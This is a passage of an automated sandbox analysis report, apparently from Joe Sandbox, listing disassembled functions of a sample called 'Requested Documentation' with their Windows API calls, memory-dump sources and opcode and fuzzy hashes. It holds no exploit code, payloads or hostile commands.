                                                                              • TranslateMessage.USER32(?), ref: 009D645C
                                                                              • DispatchMessageW.USER32(?), ref: 009D6466
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D6475
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                              • String ID:
                                                                              • API String ID: 2108273632-0
                                                                              • Opcode ID: 9c14a00ddbc9abd31e88ab65ec2a7ade73e7ab218e0bd82ed876c2a22bb610da
                                                                              • Instruction ID: 43633bd8dcd8639b9d9ad6cf5d2a92c9c2a5421ea65d54bee52d716ce5084c35
                                                                              • Opcode Fuzzy Hash: 9c14a00ddbc9abd31e88ab65ec2a7ade73e7ab218e0bd82ed876c2a22bb610da
                                                                              • Instruction Fuzzy Hash: 0931C6359806469FDB64CFF4CC44BF6BBACAB42310F14857BE421C32B1E76A944ADB50
                                                                              Function 009D8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 009D8A30
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 009D8ADA
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009D8AE2
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 009D8AF0
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009D8AF8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
                                                                              • Instruction ID: c29c8316563781abb0b0326f06f0e94ebaba7a037629138f75947f732cc393b9
                                                                              • Opcode Fuzzy Hash: abc0af0fbc1b7b958abff969241a842b1b2ba042626b0031e2c66d18faadeff2
                                                                              • Instruction Fuzzy Hash: 7D31CE71500219EFDF14CFA8D94CA9F3BB9EB04315F10862AF925EB2D2CBB49915DB90
                                                                              Function 009DB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 009DB204
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009DB221
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009DB259
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009DB27F
                                                                              • _wcsstr.LIBCMT ref: 009DB289
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 75c120b6a8b48df09c6686e83a3635333f72fe11ea0ed6670ca2ef306de0a8eb
                                                                              • Instruction ID: dc4d9ae094c783153e805a878980a17a20454cbb69ec74a7f3267932db552aa0
                                                                              • Opcode Fuzzy Hash: 75c120b6a8b48df09c6686e83a3635333f72fe11ea0ed6670ca2ef306de0a8eb
                                                                              • Instruction Fuzzy Hash: 55213A33644204BBEB259B759C49F7F7B9CDF9A710F01813AF904DA251EF61DC4192A0
                                                                              Function 00A0B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0B192
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A0B1B7
                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A0B1CF
                                                                              • GetSystemMetrics.USER32(00000004), ref: 00A0B1F8
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,009F0E90,00000000), ref: 00A0B216
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 2294984445-0
                                                                              • Opcode ID: 0eb96a8fb6e7cbb167db5171dcc3be37c6a2fa93671204e39f712c285fc7e63c
                                                                              • Instruction ID: d27f071caefd450ece9e6df4c05c9fee85c04b4f368ba6d0bef225b52dd7b6a4
                                                                              • Opcode Fuzzy Hash: 0eb96a8fb6e7cbb167db5171dcc3be37c6a2fa93671204e39f712c285fc7e63c
                                                                              • Instruction Fuzzy Hash: 2B21A371920259AFCB209F78ED14A6A37A4FB09721F104738FD32D71E1E7309852DBA0
                                                                              Function 009D9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009D9320
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9352
                                                                              • __itow.LIBCMT ref: 009D936A
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D9392
                                                                              • __itow.LIBCMT ref: 009D93A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_memmove
                                                                              • String ID:
                                                                              • API String ID: 2983881199-0
                                                                              • Opcode ID: d89663649f5cb8b2f30a85040724bbbf6dbd6179668d1a15b61195c73a1869c4
                                                                              • Instruction ID: fcfa39ca632d1c027c5f3fa8cce9c016beddcf5e3c276aeb8615cf6a3dd55786
                                                                              • Opcode Fuzzy Hash: d89663649f5cb8b2f30a85040724bbbf6dbd6179668d1a15b61195c73a1869c4
                                                                              • Instruction Fuzzy Hash: 6F21D731740208BFDB20BAA48C85FAEFBADEB89710F148026F945E73D1D6B0CD429791
                                                                              Function 009F5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 009F5A6E
                                                                              • GetForegroundWindow.USER32 ref: 009F5A85
                                                                              • GetDC.USER32(00000000), ref: 009F5AC1
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 009F5ACD
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 009F5B08
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: e8322f9027e2f3506134f91eaf24a374f248e501971dda1151118aa96f31d1a2
                                                                              • Instruction ID: a2f3effb28ca16cc6f1a38a921c17ffb48ea79bce7ecbf2a8e92d6a53cfa1cf8
                                                                              • Opcode Fuzzy Hash: e8322f9027e2f3506134f91eaf24a374f248e501971dda1151118aa96f31d1a2
                                                                              • Instruction Fuzzy Hash: 02218435A00508AFD714EFA5DC84A6AB7E5EF88311F148579F90997752CA71ED01CB90
                                                                              Function 009812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
                                                                              • SelectObject.GDI32(?,00000000), ref: 0098135C
                                                                              • BeginPath.GDI32(?), ref: 00981373
                                                                              • SelectObject.GDI32(?,00000000), ref: 0098139C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 2eb482f20ed89aac907613fccf986ba23e031e25d64f7d9a87321acef6dbc90a
                                                                              • Instruction ID: 9492b4bf98e87e9d207ba4156e81688f9d7a1756688b074d339b3aee3bcf9a35
                                                                              • Opcode Fuzzy Hash: 2eb482f20ed89aac907613fccf986ba23e031e25d64f7d9a87321acef6dbc90a
                                                                              • Instruction Fuzzy Hash: B5213038C00608EFDB11EFA5ED44B697BACFB51321F144216F814A66B1DB729993EF90
                                                                              Function 009DBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID:
                                                                              • API String ID: 2931989736-0
                                                                              • Opcode ID: 7fe28f017ed25110522c4ad771fce155eba64ba3f9ca41131ade6d674e8ea724
                                                                              • Instruction ID: f37abe18845dcfb1057779bfd433b57297ac6738f8d223be42b2be37ddb754cf
                                                                              • Opcode Fuzzy Hash: 7fe28f017ed25110522c4ad771fce155eba64ba3f9ca41131ade6d674e8ea724
                                                                              • Instruction Fuzzy Hash: 8E01B5B1684205BBD2046A399D42FFBB35CFF55388F058423FE0596342EB60DE2083E4
                                                                              Function 009E4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009E4ABA
                                                                              • __beginthreadex.LIBCMT ref: 009E4AD8
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 009E4AED
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009E4B03
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009E4B0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 3824534824-0
                                                                              • Opcode ID: c2037b5eab744ab8f1eca45a367922ac430ab9cd595f23909d9dabcca4a05e11
                                                                              • Instruction ID: 7c0bc79dc18d36db72f1461a3b0bed7032e2a165c2e0ff713b8e1c73b3b3b7b9
                                                                              • Opcode Fuzzy Hash: c2037b5eab744ab8f1eca45a367922ac430ab9cd595f23909d9dabcca4a05e11
                                                                              • Instruction Fuzzy Hash: A011E57AD04248BFC711DFF9AC08ADE7BACAB85321F144266F914D3251D6B18D0687A0
                                                                              Function 009D8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D821E
                                                                              • GetLastError.KERNEL32(?,009D7CE2,?,?,?), ref: 009D8228
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,009D7CE2,?,?,?), ref: 009D8237
                                                                              • HeapAlloc.KERNEL32(00000000,?,009D7CE2,?,?,?), ref: 009D823E
                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D8255
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
                                                                              • Instruction ID: 9eac807741d5914e675dd9100a72d6ee8931a673c1c92dbfee6d179ff8801c5f
                                                                              • Opcode Fuzzy Hash: 387c407d43aac1afe2ea9a6921995d018f8a9cbe2cacd0f70f85ff012f65ef8c
                                                                              • Instruction Fuzzy Hash: B80186B1240208FFDB208FA5DC89D677F7CEF89794B504569F919D3220DB319C02CA60
                                                                              Function 009D710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?,?,009D7455), ref: 009D7127
                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7142
                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7150
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?), ref: 009D7160
                                                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D716C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
                                                                              • Instruction ID: 5495435268a0bd6cbd9e859ccedf7ff8466dc5fd3e9c311dd873ebb2e6922016
                                                                              • Opcode Fuzzy Hash: 5d8d43c1f2ec00aeacef84b76ffffba71c3b7df58c0f5f5bcda2f512eb8fcc65
                                                                              • Instruction Fuzzy Hash: 48018476605218BFDB218FA4DC44BAABBBDEF44791F148165FD04E2310E731DD4297A0
                                                                              Function 009E5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5260
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E526E
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E5276
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 009E5280
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: 71b8e97021fb4fdbc2f7cb54cb858cb67941cee716a99ba9f4cc186dd920a3cc
                                                                              • Instruction ID: 25d00fd2f90f01970815ea24645a6966bbee3f43147f9e676d4e4ddb652f6dd4
                                                                              • Opcode Fuzzy Hash: 71b8e97021fb4fdbc2f7cb54cb858cb67941cee716a99ba9f4cc186dd920a3cc
                                                                              • Instruction Fuzzy Hash: 37016931D01A1DDBCF10EFE5E888AEDBB78FB0C315F420566EA55B2240CB3099528BA1
                                                                              Function 009D810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8121
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D812B
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D813A
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8141
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8157
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
                                                                              • Instruction ID: 611b6cfafa28bae27eff5cf7232e5b365c51448c45f1c131cb0523f9d8aeb479
                                                                              • Opcode Fuzzy Hash: 0753f1c14b1366bd7b5920726a93f66437c69b5bb7e743ac3e4655c05230e99d
                                                                              • Instruction Fuzzy Hash: C5F0C2B0244318AFEB214FA4EC89F673BACFF49794B004036FA45D6250DB609C07DA60
                                                                              Function 009DC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 009DC1F7
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 009DC20E
                                                                              • MessageBeep.USER32(00000000), ref: 009DC226
                                                                              • KillTimer.USER32(?,0000040A), ref: 009DC242
                                                                              • EndDialog.USER32(?,00000001), ref: 009DC25C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 99212f65c00d4d765a203bef66b78e024d4aa43682272834812af35d40d461a3
                                                                              • Instruction ID: 1807dc007294563149f7f0cb06a8819d59a014b062e20667924245f914bbc1a0
                                                                              • Opcode Fuzzy Hash: 99212f65c00d4d765a203bef66b78e024d4aa43682272834812af35d40d461a3
                                                                              • Instruction Fuzzy Hash: 6D01DB70444309ABEB319B90DD4EF96777CFF00705F04466AF652A15E0D7F5A945CB50
                                                                              Function 009813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 009813BF
                                                                              • StrokeAndFillPath.GDI32(?,?,009BB888,00000000,?), ref: 009813DB
                                                                              • SelectObject.GDI32(?,00000000), ref: 009813EE
                                                                              • DeleteObject.GDI32 ref: 00981401
                                                                              • StrokePath.GDI32(?), ref: 0098141C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: 663d321aac9e3d0a1c841f5529008f50b38bf4772d9ff48fafb6f78b3f777d59
